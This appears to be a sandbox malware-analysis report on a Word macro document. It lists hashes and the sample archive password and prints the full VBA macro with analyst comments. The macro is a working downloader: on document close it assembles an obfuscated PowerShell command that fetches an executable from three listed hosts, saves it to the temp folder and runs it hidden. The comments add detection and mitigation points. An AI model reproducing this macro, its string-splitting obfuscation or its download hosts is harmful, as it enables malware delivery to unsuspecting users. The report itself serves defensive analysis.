Behavioral task
behavioral1
Sample
malware300.docm
Resource
win7-20240708-en
10 signatures
150 seconds
Behavioral task
behavioral2
Sample
malware300.docm
Resource
win10v2004-20240802-en
9 signatures
150 seconds
General
-
Target
7acbd269edee0a82d503537c4227ef7203fe4a188be7b7d3c1d90f2360f69b4e
-
Size
70KB
-
MD5
eab6314ab3b3cf2bf2f59be5bb5dd5c5
-
SHA1
c63d8530b25d733004cb83dc1097ac864c6146a2
-
SHA256
7acbd269edee0a82d503537c4227ef7203fe4a188be7b7d3c1d90f2360f69b4e
-
SHA512
e619466d6169bb9253aa7554e3ffa3278dc445525022d5e21b184910360a746929caa9195111f1755df077465241039c6626881a00ec88b806d91a83b8c4fbfd
-
SSDEEP
1536:LWnLvxSWinYL13cAHhr7bHZkURdwhndpn0cHIVtDAbfdI0zXq+BO:L6pSWFcAHNHZpRdwdAcHIVqfyGXG
Score
8/10
Malware Config
Signatures
-
resource static1/unpack001/malware300
Files
-
7acbd269edee0a82d503537c4227ef7203fe4a188be7b7d3c1d90f2360f69b4e.zip
Password: infected
-
malware300.docm office2007
ThisDocument
' Listing restored to one statement per line; the viewer's gutter numbers (1-34) were
' fused into the text and are dropped. Identifiers and string literals are unchanged.
'
' Analyst summary (from the code below): the macro is a downloader. When the document
' is closed, it assembles a PowerShell one-liner from three string fragments and
' starts it through WScript.Shell with a hidden window.
'
' Detection and mitigation points visible in this listing:
'   - Word starting powershell via WScript.Shell.Run; the Defender ASR rule
'     "Block all Office applications from creating child processes" targets this.
'   - Keywords are split across "+" concatenations ("p" + "ow" + "er" + "she" + "ll",
'     "Down" + "loadFile", "S" + "tart-Pro" + "cess"), so static string matching on the
'     macro source will not see them; match on the process command line instead.
'   - A file named <number>.exe written to %TEMP% and immediately executed.
'   - Outbound HTTP requests for /admin.php?f=1 (hosts listed at NPOCIrXGZiHwY).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Entry point. Word runs a macro named AutoClose when the document is closed, so the
' chain starts on close rather than on open; an analysis run that never closes the
' document may record no activity.
Sub AutoClose()
    Dim gyoEtjsVKarhPbkq
    ' Filler value: it is passed to the launcher below, which never reads its parameter.
    gyoEtjsVKarhPbkq = "piBjIwypVXxB"
    lgczLPOJlbyvFuRyYnpBhkZb (gyoEtjsVKarhPbkq)
End Sub

' Returns the PowerShell fragment that defines $qcVYBGR, the comma-separated download
' list. Every character of the list is followed by the filler 'nXFr', which the trailing
' -replace strips at run time ("-re" + "place" is itself split).
' Decoded and defanged, the list is:
'   hxxp://gokeenakte[.]top/admin.php?f=1
'   hxxp://videoanalystes[.]webcam/admin.php?f=1
'   hxxp://photographypointer[.]men/admin.php?f=1
Function NPOCIrXGZiHwY()
    Dim EXYFFzrcdotFqdz
    EXYFFzrcdotFqdz = "$qcVYBGR = 'hnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrgnXFronXFrknXFrenXFrenXFrnnXFranXFrknXFrtnXFrenXFr.nXFrtnXFronXFrpnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1nXFr,nXFrhnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrvnXFrinXFrdnXFrenXFronXFranXFrnnXFranXFrlnXFrynXFrsnXFrtnXFrenXFrsnXFr.nXFrwnXFrenXFrbnXFrcnXFranXFrmnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1nXFr,nXFrhnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrpnXFrhnXFronXFrtnXFronXFrgnXFrrnXFranXFrpnXFrhnXFrynXFrpnXFronXFrinXFrnnXFrtnXFrenXFrrnXFr.nXFrmnXFrenXFrnnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1' -re" + "place 'nXFr', '';"
    NPOCIrXGZiHwY = EXYFFzrcdotFqdz
End Function

' Returns the PowerShell fragment that does the download and execution. It splits
' $qcVYBGR on ',' and builds the drop path $env:temp + '\' + <n> + '.exe', where <n>
' comes from $eLcL.next(1, 65536). For each URL it calls $mYRg.DownloadFile, then
' Start-Process on the dropped file, and stops at the first URL that succeeds. On an
' exception it prints the message with write-host and moves on to the next URL.
' $mYRg and $eLcL are not defined here; the launcher's prefix string creates them.
Function OCHkNFkDGVtHVAQgkAeQTfUm()
    Dim AsFmAalkqsGV
    AsFmAalkqsGV = "$bgkEHeJDiO = $qcVYBGR.Sp" + "lit(',');$dRdkqYLYer = $eLcL.next(1, 65536);$nmLnTiCn = $env:te" + "mp + '\' + $dRdkqYLYer + '.exe';for" + "each($crvyHl in $bgkEHeJDiO){try{$mYRg.Down" + "loadFile($crvyHl.ToS" + "tring(), $nmLnTiCn);S" + "tart-Pro" + "cess $nmLnTiCn;break;}catch{write-host $_.Exce" + "ption.Me" + "ssage;}}"
    OCHkNFkDGVtHVAQgkAeQTfUm = AsFmAalkqsGV
End Function

' Launcher. Concatenates, in order: the prefix built here ("powershell", then $mYRg as a
' System.Net.WebClient and $eLcL as a random object), the URL-list fragment, and the
' download fragment. It runs the result with WScript.Shell.Run and window style 0
' (hidden). The parameter IVhVynCHwZRz is unused.
Function lgczLPOJlbyvFuRyYnpBhkZb(IVhVynCHwZRz)
    Dim ojbYzLWbiTK
    Dim qETIjefSpE
    Dim TmZouuYApDKTLFfrDLvibAbw
    qETIjefSpE = NPOCIrXGZiHwY()
    TmZouuYApDKTLFfrDLvibAbw = OCHkNFkDGVtHVAQgkAeQTfUm()
    ' NOTE(review): as extracted, the last literal below has a line break before its
    ' closing quote. It is kept exactly as on the page; whether the macro holds a control
    ' character there or the viewer introduced the break cannot be told from here.
    ojbYzLWbiTK = "p" + "ow" + "er" + "she" + "ll $mYRg = n" + "ew-" + "ob" + "ject Sy" + "stem.N" + "et.We" + "bCli" + "ent;$eLcL = ne" + "w-ob" + "ject ra" + "ndo" + "m; 
"
    ' Process creation happens here: the command line is the full PowerShell script.
    CreateObject("WScript.Shell").Run ojbYzLWbiTK + qETIjefSpE + TmZouuYApDKTLFfrDLvibAbw, 0
End Function

Module1
1Attribute VB_Name = "Module1"2Module2
1Attribute VB_Name = "Module2"2